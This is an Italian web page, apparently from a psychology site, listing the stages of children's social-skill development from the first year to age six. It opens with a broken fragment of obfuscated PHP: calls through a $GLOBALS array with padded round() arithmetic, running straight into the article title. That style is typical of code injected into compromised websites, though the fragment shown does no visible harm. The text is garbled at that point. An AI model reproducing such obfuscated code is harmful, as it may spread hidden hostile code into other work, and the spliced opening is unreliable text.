=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Le tappe di sviluppo delle abilita' sociali

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

  

Bambini

Le tappe di sviluppo delle abilita' sociali PDF 

revisionato il 17 novembre 2013 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

Nel corso del primo anno:

  • ride spontaneamente;
  • reagisce in modo diverso di fronte agli estranei, rispetto alle persone familiari;
  • si mostra attento quando viene pronunciato il suo nome;
  • capisce quando gli si dice "No";
  • imita semplici azioni fatte dagli altri;

Tra uno e due anni:

  • riconosce se stesso nello specchio o in una fotografia;
  • si riferisce a se stesso usando il proprio nome;
  • gioca da solo; è in grado di iniziare a fare un gioco;
  • nei suoi giochi imita il comportamento degli adulti;
  • aiuta a mettere a posto le cose;

 

Tra i due e i tre anni:

  • gioca vicino ad altri bambini;
  • guarda gli altri bambini; gioca con loro anche se per breve tempo;
  • difende le proprie cose;
  • nel gioco usa simbolicamente sé stesso o un oggetto;
  • partecipa alle attività di piccoli gruppi;
  • conosce la sua identità personale;

 

Tra i tre e i quattro anni:

  • gioca con gli altri bambini; inizia ad interagire con loro;
  • condivide i giocattoli; è in grado di rispettare l'alternanza dei turni se guidato da un adulto;
  • inizia il “gioco di finzione” ed è in grado di recitare un'intera scena;

 

Tra i quattro e i cinque anni:

  • gioca e interagisce con altri bambini;
  • scompare il gioco di finzione e fa attenzione ai dettagli, al tempo e allo spazio;
  • inizia a mascherarsi per gioco;
  • è interessato alle differenze tra maschi e femmine;

 

Tra i cinque e i sei anni:

  • sceglie i propri amici;
  • gioca a semplici giochi da tavolo;
  • fa giochi competitivi;
  • si impegna, con altri bambini, in giochi cooperativi che includono decisioni di gruppo, assegnazioni di ruolo e l'agire con lealtà.
 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito